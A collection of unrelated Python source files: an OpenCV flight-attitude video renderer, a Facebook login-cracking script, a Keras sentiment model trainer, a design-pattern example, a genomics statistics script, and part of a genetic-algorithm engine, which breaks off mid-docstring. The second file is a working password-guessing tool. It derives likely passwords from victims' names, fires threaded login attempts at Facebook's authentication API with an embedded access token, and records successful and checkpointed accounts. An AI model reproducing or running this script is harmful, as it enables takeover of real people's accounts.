speedCenter = (originalSpeed.width/2.0, originalSpeed.height/2.0) speedWidth = originalSpeed.width speedHeight = originalSpeed.height zacetnaPozicija = speedHeight/2.0 if data_speed[x] < 0: zacetnaPozicija = zacetnaPozicija - 210 elif data_speed[x] >= 100: zacetnaPozicija = zacetnaPozicija + 210 else: zacetnaPozicija = zacetnaPozicija + (200-(data_speed[x]*4)) doDol = speedHeight - zacetnaPozicija if (doDol > 130): doDol = 130 doGor = zacetnaPozicija if (doGor > 130): doGor = 130 regionOfInterest = (int(0), int(zacetnaPozicija-doGor), int(speedWidth), int(doDol+doGor)) currentSpeed = cv.GetSubRect(originalSpeed, regionOfInterest) regionOfInterest = (int(width/2.0 - 190 - currentSpeed.width/2.0), int(height/2.0 - doGor), int(speedWidth), int(doGor+doDol)) pointerToWhereToCopySpeed = cv.GetSubRect(thirdHorizon, regionOfInterest) cv.Sub(pointerToWhereToCopySpeed, currentSpeed, pointerToWhereToCopySpeed) # 4 ------------------------------------------------ lokalniOdmik = 0 if data_altitude[x] < 0: lokalniOdmik = 2010 elif data_altitude[x] >= 1000: lokalniOdmik = -2010 else: lokalniOdmik = -(2000-(data_altitude[x]*4)) temp = currentAltitude.height / 2.0 doDol = (temp + lokalniOdmik) if (doDol > 130): doDol = 130 doGor = temp - lokalniOdmik if (doGor > 130): doGor = 130 regionOfInterest = (int(0), int(currentAltitude.height/2.0 - lokalniOdmik - doGor), int(speedWidth), int(doGor+doDol)) cutAltitude = cv.GetSubRect(currentAltitude, regionOfInterest) regionOfInterest = (int(width/2.0 + 160), int(height/2.0 - doGor), int(70), int(doGor+doDol)) pointerToWhereToCopyAltitude = cv.GetSubRect(thirdHorizon, regionOfInterest) cv.Sub(pointerToWhereToCopyAltitude, cutAltitude, pointerToWhereToCopyAltitude) # ------------------------------------------------ lokalniOdmik = 0 if data_climb[x] < -10: lokalniOdmik = -410 elif data_climb[x] >= 10: lokalniOdmik = 410 else: lokalniOdmik = ((data_climb[x]*4*10)) temp = currentClimb .height / 2.0 doDol = (temp + lokalniOdmik) if (doDol > 130): doDol = 130 doGor = temp - lokalniOdmik if (doGor > 130): doGor = 130 regionOfInterest = (int(0), int(currentClimb.height/2.0 - lokalniOdmik - doGor), int(speedWidth), int(doGor+doDol)) cutClimb = cv.GetSubRect(currentClimb, regionOfInterest) regionOfInterest = (int(width/2.0 + 245), int(height/2.0 - doGor), int(70), int(doGor+doDol)) pointerToWhereToCopyClimb = cv.GetSubRect(thirdHorizon, regionOfInterest) cv.Sub(pointerToWhereToCopyClimb, cutClimb, pointerToWhereToCopyClimb) # 5 ------------------------------------------------ cv.SaveImage("/dev/shm/attitude2video_opencv/composed.png", thirdHorizon) os.system("cp /dev/shm/attitude2video_opencv/composed.png "+inputArgs.sessionFolder[0]+"/media/work/attitude_opencv/attitude_"+"%07d.png" % (x+1,)) # CLEAR ALL VARIABLES! You know, memory leaks and such. # 6 ------------------------------------------------ # KONEC os.system("avconv -r 30 -i "+inputArgs.sessionFolder[0]+"/media/work/attitude_opencv/attitude_"+"%07d.png -qscale 1 -b 1300k -vcodec libx264 "+inputArgs.sessionFolder[0]+"/media/attitude.mp4") # remove working directory with temporary files fileList = os.listdir(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv") for fileName in fileList: os.remove(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv"+"/"+fileName) os.rmdir(inputArgs.sessionFolder[0]+"/media/work/attitude_opencv") #os.rmdir(inputArgs.sessionFolder[0]+"/media/work") # remove working directory with temporary files in shared memmory fileList = os.listdir("/dev/shm/attitude2video_opencv") for fileName in fileList: os.remove("/dev/shm/attitude2video_opencv"+"/"+fileName) os.rmdir("/dev/shm/attitude2video_opencv") os.system("rm -f /run/shm/attitude2video_opencv.lock") def progressbar(progress, prefix = "", postfix = "", size = 60) : x = int(size*progress) sys.stdout.write("%s [%s%s] %d%% %s\r" % (prefix, "#"*x, "."*(size-x), (int)(progress*100), postfix)) sys.stdout.flush() if __name__ == "__main__": # this is not a module parseInput() # what do we have to do processInput() # doing what we have to do print "" # for estetic output
#!/usr/bin/env python3 # Author : Gobel # Github : Gobel-coder # Facebook : fb.me/fadlykaes import os import json import requests from concurrent.futures import ThreadPoolExecutor global result,check,die life = [] chek = [] result = 0 check = 0 die = 0 def sorting(users,cek=False): with ThreadPoolExecutor(max_workers=30) as ex: if not cek: expas = input("# extra password : ") for user in users: users = user.split('|') ss = users[0].split(' ') if len(ss) == 1: pass1 = ss[0] + "123" pass2 = ss[0] + "12345" pass3 = ss[0] + "12" pass4 = ss[0] + "1234" pass5 = ss[0] + "01" pass6 = ss[0] + "123456" elif len(ss) == 2: pass1 = ss[0] + "123" pass2 = ss[0] + "12345" pass3 = ss[1] + "12" pass4 = ss[1] + "1234" pass5 = ss[0] + "123456" pass6 = ss[0] + "01" elif len(ss) == 3: pass1 = ss[0] + "123" pass2 = ss[0] + "12345" pass3 = ss[0] + "12" pass4 = ss[1] + "01" pass5 = ss[1] + "12" pass6 = ss[1] + "12345" listpass = [ pass1, pass2, pass3, pass4, pass5, pass6, expas, ] for passw in listpass: ex.submit(login,(users[1]),(passw)) else: for user in users: frx = user.split("|") ex.submit(login,(frx[0]),(frx[1]),(True)) if cek: os.remove("results-check.txt") os.remove("results-life.txt") for x in life: with open('results-life.txt','a') as f: f.write(x+'\n') for x in chek: with open('results-check.txt','a') as f: f.write(x+"\n") print("\n# Done") print("# saved to results-check.txt results-life.txt") elif check != 0 or result != 0: print("\n# Done. file saved in : ") print(" - life : results-life.txt") print(" - checkpoint : results-check.txt") exit("# thanks for using this tools") else: print("\n# Done") exit("# no result") def login(username,password,cek=False): global result,check,die b = "350685531728%7C62f8ce9f74b12f84c123cc23437a4a32" params = { 'access_token': b, 'format': 'JSON', 'sdk_version': '2', 'email': username, 'locale': 'en_US', 'password': password, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6', } api = 'https://b-api.facebook.com/method/auth.login' response = requests.get(api, params=params) if 'session_key' in response.text and "EAAA" in response.text: print(f"\r \033[0;m[\033[92;mLIFE\033[0;m] {username} => {password} ",end="") print() result += 1 if cek: life.append(username+"|"+password) else: with open('results-life.txt','a') as f: f.write(username + '|' + password + '\n') elif 'www.facebook.com' in response.json()['error_msg']: print(f"\r \033[0;m[\033[93;mCHEK\033[0;m] {username} => {password} ",end="") print() check += 1 if cek: chek.append(username+"|"+password) else: with open('results-check.txt','a') as f: f.write(username + '|' + password + '\n') else: die += 1 print(f"\r# life : (\033[92;m{str(result)}\033[0;m)|checkpoint : (\033[93;m{str(check)}\033[0;m)|die : ({str(die)})",end="")
import codecs import os import string import numpy from keras import regularizers from keras.layers import Dense, Embedding, LSTM, CuDNNLSTM, SpatialDropout1D, Input, Bidirectional, Dropout, \ BatchNormalization, Lambda, concatenate, Flatten from keras.models import Model from keras.models import load_model from keras.preprocessing.sequence import pad_sequences from keras.initializers import Constant from scipy import sparse # precision recall f1-score support # # B 0.9445 0.9460 0.9453 56882 # M 0.6950 0.8280 0.7557 11479 # E 0.9421 0.9359 0.9390 56882 # S 0.9441 0.9061 0.9247 47490 # # micro avg 0.9239 0.9239 0.9239 172733 # macro avg 0.8814 0.9040 0.8912 172733 # weighted avg 0.9270 0.9239 0.9249 172733 # {'mean_squared_error': 0.2586491465518497, 'mean_absolute_error': 0.27396197698378544, 'mean_absolute_percentage_error': 0.3323864857505891, 'mean_squared_logarithmic_error': 0.2666326968685906, 'squared_hinge': 0.2827528866772688, 'hinge': 0.27436352076398335, 'categorical_crossentropy': 0.3050300775957548, 'binary_crossentropy': 0.7499999871882543, 'kullback_leibler_divergence': 0.30747676168440974, 'poisson': 0.2897763648871911, 'cosine_proximity': 0.3213321868358391, 'sgd': 0.27380688950156684, 'rmsprop': 0.4363407859974404, 'adagrad': 0.5028908227192664, 'adadelta': 0.3134481079882679, 'adam': 0.342444794579377, 'adamax': 0.36860069757644914, 'nadam': 0.39635284171196516} words = [] with codecs.open('plain/actor_dic.utf8', 'r', encoding='utf8') as fa: lines = fa.readlines() lines = [line.strip() for line in lines] words.extend(lines) rxwdict = dict(zip(words,range(1, 1+len(words)))) rxwdict['\n'] =0 rydict = dict(zip(list("ABCDEFZ"), range(len("ABCDEFZ")))) ytick = [0,18,32,263.5,1346,2321,244001] def getYClass(y): r = 0 for i in range(len(ytick)): if int(y) >= ytick[i]: return r else: r+=1 assert r<len(ytick), (y,r) return r batch_size = 20 nFeatures = 5 seqlen = 225#85 totallen = nFeatures+seqlen word_size = 11 actors_size = 8380 Hidden = 150 Regularization = 1e-4 Dropoutrate = 0.2 learningrate = 0.2 Marginlossdiscount = 0.2 nState = 7 EPOCHS = 60 modelfile = os.path.basename(__file__).split(".")[0] loss = "squared_hinge" optimizer = "nadam" sequence = Input(shape=(totallen,)) seqsa= Lambda(lambda x: x[:, 0:nFeatures])(sequence) seqsb = Lambda(lambda x: x[:, nFeatures:])(sequence) network_emb = sparse.load_npz("model/weibo_wembedding.npz").todense() embedded = Embedding(len(words) + 1, word_size, embeddings_initializer=Constant(network_emb), input_length=seqlen, mask_zero=False, trainable=True)(seqsb) networkcore_emb = sparse.load_npz("model/weibo_coreembedding.npz").todense() embeddedc = Embedding(len(words) + 1, actors_size, embeddings_initializer=Constant(networkcore_emb), input_length=seqlen, mask_zero=False, trainable=True)(seqsb) concat = concatenate([embedded, embeddedc]) # dropout = Dropout(Dropoutrate)(embedded) dropout = SpatialDropout1D(rate=Dropoutrate)(concat) # blstm = Bidirectional(LSTM(Hidden, dropout=Dropoutrate, recurrent_dropout=Dropoutrate, return_sequences=False), merge_mode='sum')(dropout) blstm = Bidirectional(CuDNNLSTM(Hidden, return_sequences=False), merge_mode='sum')(dropout) concat = concatenate([seqsa, blstm]) # dropout = Dropout(Dropoutrate)(blstm) batchNorm = BatchNormalization()(concat) dense = Dense(nState, activation='softmax', kernel_regularizer=regularizers.l2(Regularization))(batchNorm) model = Model(input=sequence, output=dense) model.compile(loss=loss, optimizer=optimizer, metrics=["accuracy"]) model.summary() # model.save("keras/B20-E60-F1-PU-L-Bn-De.h5") MODE = 1 if MODE == 1: with codecs.open('plain/movie_sentiments.utf8', 'r', encoding='utf8') as fs: with codecs.open('plain/movie_years.utf8', 'r', encoding='utf8') as fy: with codecs.open('weibo_dic/movie_ndic.utf8', 'r', encoding='utf8') as fd: with codecs.open('plain/movie_actornames.utf8', 'r', encoding='utf8') as fa: with codecs.open('plain/movie_states.utf8', 'r', encoding='utf8') as ff: ylines = fy.readlines() slines = fs.readlines() alines = fa.readlines() dlines = fd.readlines() flines = ff.readlines() assert len(dlines) == len(alines) and len(alines) == len(slines) and len(slines) == len(ylines) and len(flines) == len(ylines) X = [] print('process X list.') counter = 0 for i in range(len(dlines)): item = [] item.append(ylines[i].strip()) item.extend(slines[i].strip().split(',')) item = [int(i) for i in item] # year, p, n item.append(item[1] + item[2]) # total item.append(item[1] / item[2] if item[2] != 0 else 0) # PN-ratio anames = alines[i].strip().split(',') item.extend([rxwdict.get(name, 0) for name in anames]) # pad right '\n' #print(len(item)) item.extend([0]*(totallen - len(item))) assert len(item) == totallen,(len(item)) X.append(item) if counter % 10000 == 0 and counter != 0: print('.') X = numpy.array(X) print(X.shape) y=[] print('process y list.') for line in flines: line = line.strip() yi = numpy.zeros((len("ABCDEFZ")), dtype=int) yi[getYClass(line)] = 1 y.append(yi) y = numpy.array(y) print(y.shape) history = model.fit(X, y, batch_size=batch_size, nb_epoch=EPOCHS, verbose=1) model.save("keras/%s.h5"%modelfile) print('FIN') if MODE == 2: STATES = list("BMES") with codecs.open('plain/pku_test.utf8', 'r', encoding='utf8') as ft: with codecs.open('baseline/pku_test_B20-E60-F1-PU-L-Bn-De_states.txt', 'w', encoding='utf8') as fl: model = load_model("keras/B20-E60-F1-PU-L-Bn-De.h5") model.summary() xlines = ft.readlines() X = [] print('process X list.') counter = 0 for line in xlines: line = line.replace(" ", "").strip() # X.append([getFeaturesDict(line, i) for i in range(len(line))]) X.append([rxdict.get(e, 0) for e in list(line)]) counter += 1 if counter % 1000 == 0 and counter != 0: print('.') print(len(X)) X = pad_sequences(X, maxlen=maxlen, padding='pre', value=0) print(len(X), X.shape) yp = model.predict(X) print(yp.shape) for i in range(yp.shape[0]): sl = yp[i] lens = len(xlines[i].strip()) for s in sl[-lens:]: i = numpy.argmax(s) fl.write(STATES[i]) fl.write('\n') print('FIN') # for sl in yp: # for s in sl: # i = numpy.argmax(s) # fl.write(STATES[i]) # fl.write('\n') # print('FIN')
# py3.8 ########################################################### # # # 运输 # # # ########################################################### class Transport(object): def deliver(self): raise NotImplementedError class Truck(Transport): def deliver(self): print("Truck: deliver") class Ship(Transport): def deliver(self): print("Ship: deliver") ########################################################### # # # 物流 # # # ########################################################### class Logistics(object): def planDelivery(self): transport = self.createTransport() transport.deliver() def createTransport(self) -> Transport: raise NotImplementedError class RoadLogistics(Logistics): def createTransport(self) -> Transport: return Truck() class SeaLogistics(Logistics): def createTransport(self) -> Transport: return Ship() if __name__ == '__main__': road_logistics = RoadLogistics() road_logistics.planDelivery() print("page074")
########################################################## ### Import Necessary Modules import argparse #provides options at the command line import sys #take command line arguments and uses it in the script import gzip #allows gzipped files to be read import re #allows regular expressions to be used ########################################################## ### Command-line Arguments parser = argparse.ArgumentParser(description="A script to partition individuals form a rolling window statistic script (VCF.stats.windowBased.v1.0.py)") parser.add_argument("-file", help = "The statistic file", default=sys.stdin, required=True) parser.add_argument("-ind", help = "The list of individuals seperated by a comma (no spaces), default = NA", default="NA") parser.add_argument("-avg", help = "Find the average for individuals and only return that (doesn't output the header and format is for circos plot), default = no, option = yes", default="no") parser.add_argument("-out", help = "If finding the average, what field? default=count, options=depth, het, mis", default="count") parser.add_argument("-win", help = "What was the window size used to generate data? default=10000", default=10000) parser.add_argument("-chr", help = "Keep the chromosomes in the following comma delimited list (no spaces) and convert to number. default=no", default="no") args = parser.parse_args() ######################################################### ### Variables class OpenFile(): def __init__ (self, f, typ, fnum): """Opens a file (gzipped) accepted""" if re.search(".gz$", f): self.filename = gzip.open(f, 'rb') else: self.filename = open(f, 'r') if typ == "file": if int(fnum) == 1: sys.stderr.write("\n\tOpened stats file: {}\n\n".format(f)) ReadFile(self.filename,fnum,f) class ReadFile(): def __init__ (self, f, fnum, fname): self.openFile = f self.keep = args.ind.split(",") self.header = "NA" self.total = {} self.count = {} if re.search(".gz$", fname): self.header = self.openFile.readline().decode('utf-8').rstrip('\n') else: self.header = self.openFile.readline().rstrip('\n') if args.avg == "no": print("{}".format(self.header)) for line in self.openFile: try: line = line.decode('utf-8') except: pass line = line.rstrip('\n') self.ind, self.mis, self.hRef, self.Het, self.hAlt, self.aDepth, self.window, self.scaffold = line.split() if self.ind in self.keep: if args.avg == "no": print("{}".format(line)) else: self.value = "NA" if args.out == "count": self.value = int(self.mis) + int(self.hRef) + int(self.Het) + int(self.hAlt) elif args.out == "depth": try: self.value = float(self.aDepth) except: self.value = "NA" elif args.out == "het": self.value = int(self.Het)/float(int(self.mis) + int(self.hRef) + int(self.Het) + int(self.hAlt)) elif args.out == "mis": self.value = int(self.mis)/float(int(self.mis) + int(self.hRef) + int(self.Het) + int(self.hAlt)) if self.value != "NA": if self.scaffold in self.total: if self.window in self.total[self.scaffold]: self.total[self.scaffold][self.window] += self.value self.count[self.scaffold][self.window] += 1 else: self.total[self.scaffold][self.window] = self.value self.count[self.scaffold][self.window] = 1 else: self.total[self.scaffold] = {} self.count[self.scaffold] = {} self.total[self.scaffold][self.window] = self.value self.count[self.scaffold][self.window] = 1 if args.avg == "yes": for self.scaffold in sorted(self.total): for self.window in sorted(self.total[self.scaffold], key = int): if args.chr == "no": print ("{}\t{}\t{}\t{}".format(self.scaffold, int(self.window) - (int(args.win) - 1), int(self.window), float(self.total[self.scaffold][self.window])/int(self.count[self.scaffold][self.window]))) else: self.allChroms = args.chr.split(",") for self.chrNum, self.chr in enumerate(self.allChroms): if self.chr == self.scaffold: print ("{}\t{}\t{}\t{}".format(int(self.chrNum) + 1, int(self.window) - (int(args.win) - 1), int(self.window), float(self.total[self.scaffold][self.window])/int(self.count[self.scaffold][self.window]))) if __name__ == '__main__': open_file = OpenFile(args.file, "file", 1)
#!/usr/bin/env python # -*- coding: utf8 -*- # ***************************************************************** # ** PTS -- Python Toolkit for working with SKIRT ** # ** © Astronomical Observatory, Ghent University ** # ***************************************************************** ## \package pts.evolve.simplega This module contains the GA Engine, the GA Engine class is responsible # for all the evolutionary process. It contains the GA Engine related # functions, like the Termination Criteria functions for convergence analysis, etc. # # Default Parameters: #*Number of Generations* # Default is 100 generations #*Mutation Rate* # Default is 0.02, which represents 2% #*Crossover Rate* # Default is 0.9, which represents 90% #*Elitism Replacement* # Default is 1 individual #*Population Size* # Default is 80 individuals #*Minimax* # >>> constants.minimaxType["maximize"] # Maximize the evaluation function #*DB Adapter* # Default is **None** #*Migration Adapter* # Default is **None** #*Interactive Mode* # Default is **True** #*Selector (Selection Method)* # :func:`Selectors.GRankSelector` # The Rank Selection method # # ----------------------------------------------------------------- # Ensure Python 3 functionality from __future__ import division, print_function # Import standard modules import numpy as np from time import time from types import BooleanType from sys import stdout as sys_stdout # Import other evolve modules from population import GPopulation from functionslot import FunctionSlot from genome import GenomeBase from dbadapters import DBBaseAdapter import constants import utils # Import the relevant PTS classes and modules from ..core.tools.logging import log from ..core.tools import serialization from ..core.tools.random import prng # ----------------------------------------------------------------- def RawScoreCriteria(ga_engine): """ Terminate the evolution using the **bestrawscore** and **rounddecimal** parameter obtained from the individual Example: >>> genome.setParams(bestrawscore=0.00, rounddecimal=2) (...) >>> ga_engine.terminationCriteria.set(GSimpleGA.RawScoreCriteria) """ ind = ga_engine.bestIndividual() bestRawScore = ind.getParam("bestrawscore") roundDecimal = ind.getParam("rounddecimal") if bestRawScore is None: utils.raiseException("you must specify the bestrawscore parameter", ValueError) if ga_engine.getMinimax() == constants.minimaxType["maximize"]: if roundDecimal is not None: return round(bestRawScore, roundDecimal) <= round(ind.score, roundDecimal) else: return bestRawScore <= ind.score else: if roundDecimal is not None: return round(bestRawScore, roundDecimal) >= round(ind.score, roundDecimal) else: return bestRawScore >= ind.score # ----------------------------------------------------------------- def ConvergenceCriteria(ga_engine): """ Terminate the evolution when the population have converged Example: >>> ga_engine.terminationCriteria.set(GSimpleGA.ConvergenceCriteria) """ pop = ga_engine.get_population() return pop[0] == pop[len(pop) - 1] # ----------------------------------------------------------------- def RawStatsCriteria(ga_engine): """ Terminate the evolution based on the raw stats Example: >>> ga_engine.terminationCriteria.set(GSimpleGA.RawStatsCriteria) """ stats = ga_engine.getStatistics() if stats["rawMax"] == stats["rawMin"]: if stats["rawAve"] == stats["rawMax"]: return True return False # ----------------------------------------------------------------- def FitnessStatsCriteria(ga_engine): """ Terminate the evoltion based on the fitness stats Example: >>> ga_engine.terminationCriteria.set(GSimpleGA.FitnessStatsCriteria) """ stats = ga_engine.getStatistics() if stats["fitMax"] == stats["fitMin"]: if stats["fitAve"] == stats["fitMax"]: return True return False # ----------------------------------------------------------------- class GAEngine(object): """ This class represents the Genetic Algorithm Engine Example: >>> ga = GAEngine(genome) >>> ga.selector.set(Selectors.GRouletteWheel) >>> ga.setGenerations(120) >>> ga.terminationCriteria.set(GSimpleGA.ConvergenceCriteria) :param genome: the :term:`Sample Genome` :param interactiveMode: this flag enables the Interactive Mode, the default is True .. note:: if you use the same random seed, all the runs of algorithm will be the same """ selector = None """ This is the function slot for the selection method if you want to change the default selector, you must do this: :: ga_engine.selector.set(Selectors.GRouletteWheel) """ stepCallback = None """ This is the :term:`step callback function` slot, if you want to set the function, you must do this: :: def your_func(ga_engine): # Here you have access to the GA Engine return False ga_engine.stepCallback.set(your_func) now *"your_func"* will be called every generation. When this function returns True, the GA Engine will stop the evolution and show a warning, if False, the evolution continues. """ terminationCriteria = None """ This is the termination criteria slot, if you want to set one termination criteria, you must do this: :: ga_engine.terminationCriteria.set(GSimpleGA.ConvergenceCriteria) Now, when you run your GA, it will stop when the population converges. There are those termination criteria functions: :func:`GSimpleGA.RawScoreCriteria`, :func:`GSimpleGA.ConvergenceCriteria`, :func:`GSimpleGA.RawStatsCriteria`, :func:`GSimpleGA.FitnessStatsCriteria` But you can create your own termination function, this function receives one parameter which is the GA Engine, follows an example: :: def ConvergenceCriteria(ga_engine): pop = ga_engine.get_population() return pop[0] == pop[len(pop)-1] When this function returns True, the GA Engine will stop the evolution and show a warning, if False, the evolution continues, this function is called every generation. """ def __init__(self, genome, interactiveMode=True): """ Initializator of GSimpleGA """ #if seed is not None: random.seed(seed) # used to be like this if type(interactiveMode) != BooleanType: utils.raiseException("Interactive Mode option must be True or False", TypeError) if not isinstance(genome, GenomeBase): utils.raiseException("The genome must be a GenomeBase subclass", TypeError) self.internalPop = GPopulation(genome) self.nGenerations = constants.CDefGAGenerations self.pMutation = constants.CDefGAMutationRate self.pCrossover = constants.CDefGACrossoverRate self.nElitismReplacement = constants.CDefGAElitismReplacement self.setPopulationSize(constants.CDefGAPopulationSize) self.minimax = constants.minimaxType["maximize"] self.elitism = True # NEW self.new_population = None # Adapters self.dbAdapter = None self.migrationAdapter = None self.time_init = None self.max_time = None self.interactiveMode = interactiveMode self.interactiveGen = -1 self.GPMode = False self.selector = FunctionSlot("Selector") self.stepCallback = FunctionSlot("Generation Step Callback") self.terminationCriteria = FunctionSlot("Termination Criteria") self.selector.set(constants.CDefGASelector) self.allSlots = (self.selector, self.stepCallback, self.terminationCriteria) self.internalParams = {} self.currentGeneration = 0 # GP Testing for classes in constants.CDefGPGenomes: if isinstance(self.internalPop.oneSelfGenome, classes): self.setGPMode(True) break log.debug("A GA Engine was created, nGenerations=%d", self.nGenerations) # New self.path = None # ----------------------------------------------------------------- @classmethod def from_file(cls, path): """ This function ... :param path: :return: """ # Inform the user log.info("Loading the genetic algorithm engine from '" + path + "' ...") # Load the GA object from file ga = serialization.load(path) # Set the path of the GA file ga.path = path # Return the GA return ga # ----------------------------------------------------------------- def save(self): """ This function ... :return: """ # Save to the current path self.saveto(self.path) # ----------------------------------------------------------------- def saveto(self, path): """ This function ... :param path: :return: """ # Inform the user log.info("Saving the genetic algorithm engine to '" + path + "' ...") # Set the new path as the current path and save self.path = path serialization.dump(self, path, protocol=2) # ----------------------------------------------------------------- def setGPMode(self, bool_value): """ Sets the Genetic Programming mode of the GA Engine :param bool_value: True or False """ self.GPMode = bool_value # ----------------------------------------------------------------- def getGPMode(self): """ Get the Genetic Programming mode of the GA Engine :rtype: True or False """ return self.GPMode # ----------------------------------------------------------------- def __call__(self, *args, **kwargs): """ A method to implement a callable object Example: >>> ga_engine(freq_stats=10) .. versionadded:: 0.6 The callable method. """ if kwargs.get("freq_stats", None): return self.evolve(kwargs.get("freq_stats")) else: return self.evolve() # ----------------------------------------------------------------- def setParams(self, **args): """ Set the internal params Example: >>> ga.setParams(gp_terminals=['x', 'y']) :param args: params to save ..versionaddd:: 0.6 Added the *setParams* method. """ self.internalParams.update(args) # ----------------------------------------------------------------- def getParam(self, key, nvl=None): """ Gets an internal parameter Example: >>> ga.getParam("gp_terminals") ['x', 'y'] :param key: the key of param :param nvl: if the key doesn't exist, the nvl will be returned ..versionaddd:: 0.6 Added the *getParam* method. """ return self.internalParams.get(key, nvl) # ----------------------------------------------------------------- def setInteractiveGeneration(self, generation): """ Sets the generation in which the GA must enter in the Interactive Mode :param generation: the generation number, use "-1" to disable .. versionadded::0.6 The *setInteractiveGeneration* method. """ if generation < -1: utils.raiseException("Generation must be >= -1", ValueError) self.interactiveGen = generation # ----------------------------------------------------------------- def getInteractiveGeneration(self): """ returns the generation in which the GA must enter in the Interactive Mode :rtype: the generation number or -1 if not set .. versionadded::0.6 The *getInteractiveGeneration* method. """ return self.interactiveGen # ----------------------------------------------------------------- def setElitismReplacement(self, numreplace): """ Set the number of best individuals to copy to the next generation on the elitism :param numreplace: the number of individuals .. versionadded:: 0.6 The *setElitismReplacement* method. """ if numreplace < 1: utils.raiseException("Replacement number must be >= 1", ValueError) self.nElitismReplacement = numreplace # ----------------------------------------------------------------- def setInteractiveMode(self, flag=True): """ Enable/disable the interactive mode :param flag: True or False .. versionadded: 0.6 The *setInteractiveMode* method. """ if type(flag) != BooleanType: utils.raiseException("Interactive Mode option must be True or False", TypeError) self.interactiveMode = flag # ----------------------------------------------------------------- def __repr__(self): """ The string representation of the GA Engine """ minimax_type = constants.minimaxType.keys()[constants.minimaxType.values().index(self.minimax)] ret = "- GSimpleGA\n" ret += "\tGP Mode:\t\t %s\n" % self.getGPMode() ret += "\tPopulation Size:\t %d\n" % self.internalPop.popSize ret += "\tGenerations:\t\t %d\n" % self.nGenerations ret += "\tCurrent Generation:\t %d\n" % self.currentGeneration ret += "\tMutation Rate:\t\t %.2f\n" % self.pMutation ret += "\tCrossover Rate:\t\t %.2f\n" % self.pCrossover ret += "\tMinimax Type:\t\t %s\n" % minimax_type.capitalize() ret += "\tElitism:\t\t %s\n" % self.elitism ret += "\tElitism Replacement:\t %d\n" % self.nElitismReplacement ret += "\tDB Adapter:\t\t %s\n" % self.dbAdapter for slot in self.allSlots: ret += "\t" + slot.__repr__() ret += "\n" # Return the string return ret # ----------------------------------------------------------------- def setMultiProcessing(self, flag=True, full_copy=False, max_processes=None): """ Sets the flag to enable/disable the use of python multiprocessing module. Use this option when you have more than one core on your CPU and when your evaluation function is very slow. Pyevolve will automaticly check if your Python version has **multiprocessing** support and if you have more than one single CPU core. If you don't have support or have just only one core, Pyevolve will not use the **multiprocessing** feature. Pyevolve uses the **multiprocessing** to execute the evaluation function over the individuals, so the use of this feature will make sense if you have a truly slow evaluation function (which is commom in GAs). The parameter "full_copy" defines where the individual data should be copied back after the evaluation or not. This parameter is useful when you change the individual in the evaluation function. :param flag: True (default) or False :param full_copy: True or False (default) :param max_processes: None (default) or an integer value .. warning:: Use this option only when your evaluation function is slow, so you'll get a good tradeoff between the process communication speed and the parallel evaluation. The use of the **multiprocessing** doesn't means always a better performance. .. note:: To enable the multiprocessing option, you **MUST** add the *__main__* check on your application, otherwise, it will result in errors. See more on the `Python Docs <http://docs.python.org/library/multiprocessing.html#multiprocessing-programming>`__ site. .. versionadded:: 0.6 The `setMultiProcessing` method. """ if type(flag) != BooleanType: utils.raiseException("Multiprocessing option must be True or False", TypeError) if type(full_copy) != BooleanType: utils.raiseException("Multiprocessing 'full_copy' option must be True or False", TypeError) self.internalPop.setMultiProcessing(flag, full_copy, max_processes) # ----------------------------------------------------------------- def setMigrationAdapter(self, migration_adapter=None): """ Sets the Migration Adapter .. versionadded:: 0.6 The `setMigrationAdapter` method. """ self.migrationAdapter = migration_adapter if self.migrationAdapter is not None: self.migrationAdapter.setGAEngine(self) # ----------------------------------------------------------------- def setDBAdapter(self, dbadapter=None): """ Sets the DB Adapter of the GA Engine :param dbadapter: one of the :mod:`DBAdapters` classes instance .. warning:: the use the of a DB Adapter can reduce the speed performance of the Genetic Algorithm. """ if (dbadapter is not None) and (not isinstance(dbadapter, DBBaseAdapter)): utils.raiseException("The DB Adapter must be a DBBaseAdapter subclass", TypeError) self.dbAdapter = dbadapter # ----------------------------------------------------------------- def setPopulationSize(self, size): """ Sets the population size, calls setPopulationSize() of GPopulation :param size: the population size .. note:: the population size must be >= 2 """ if size < 2: utils.raiseException("population size must be >= 2", ValueError) self.internalPop.setPopulationSize(size) # ----------------------------------------------------------------- def setSortType(self, sort_type): """ Sets the sort type, constants.sortType["raw"]/constants.sortType["scaled"] Example: >>> ga_engine.setSortType(constants.sortType["scaled"]) :param sort_type: the Sort Type """ if sort_type not in constants.sortType.values(): utils.raiseException("sort type must be a constants.sortType type", TypeError) self.internalPop.sortType = sort_type # ----------------------------------------------------------------- def setMutationRate(self, rate): """ Sets the mutation rate, between 0.0 and 1.0 :param rate: the rate, between 0.0 and 1.0 """ if (rate > 1.0) or (rate < 0.0): utils.raiseException("Mutation rate must be >= 0.0 and <= 1.0", ValueError) self.pMutation = rate # ----------------------------------------------------------------- def setCrossoverRate(self, rate): """ Sets the crossover rate, between 0.0 and 1.0 :param rate: the rate, between 0.0 and 1.0 """ if (rate > 1.0) or (rate < 0.0): utils.raiseException("Crossover rate must be >= 0.0 and <= 1.0", ValueError) self.pCrossover = rate # ----------------------------------------------------------------- def setGenerations(self, num_gens): """ Sets the number of generations to evolve :param num_gens: the number of generations """ if num_gens < 1: utils.raiseException("Number of generations must be >= 1", ValueError) self.nGenerations = num_gens # ----------------------------------------------------------------- def getGenerations(self): """ Return the number of generations to evolve :rtype: the number of generations .. versionadded:: 0.6 Added the *getGenerations* method """ return self.nGenerations # ----------------------------------------------------------------- def getMinimax(self): """ Gets the minimize/maximize mode :rtype: the constants.minimaxType type """ return self.minimax # ----------------------------------------------------------------- def setMinimax(self, mtype): """ Sets the minimize/maximize mode, use constants.minimaxType :param mtype: the minimax mode, from constants.minimaxType """ if mtype not in constants.minimaxType.values(): utils.raiseException("Minimax must be maximize or minimize", TypeError) self.minimax = mtype # ----------------------------------------------------------------- def getCurrentGeneration(self): """ Gets the current generation :rtype: the current generation """ return self.currentGeneration # ----------------------------------------------------------------- def setElitism(self, flag): """ Sets the elitism option, True or False :param flag: True or False """ if type(flag) != BooleanType: utils.raiseException("Elitism option must be True or False", TypeError) self.elitism = flag # ----------------------------------------------------------------- def getDBAdapter(self): """ Gets the DB Adapter of the GA Engine :rtype: a instance from one of the :mod:`DBAdapters` classes """ return self.dbAdapter # ----------------------------------------------------------------- def setMaxTime(self, seconds): """ Sets the maximun evolve time of the GA Engine :param seconds: maximum time in seconds """ self.max_time = seconds # ----------------------------------------------------------------- def getMaxTime(self): """ Get the maximun evolve time of the GA 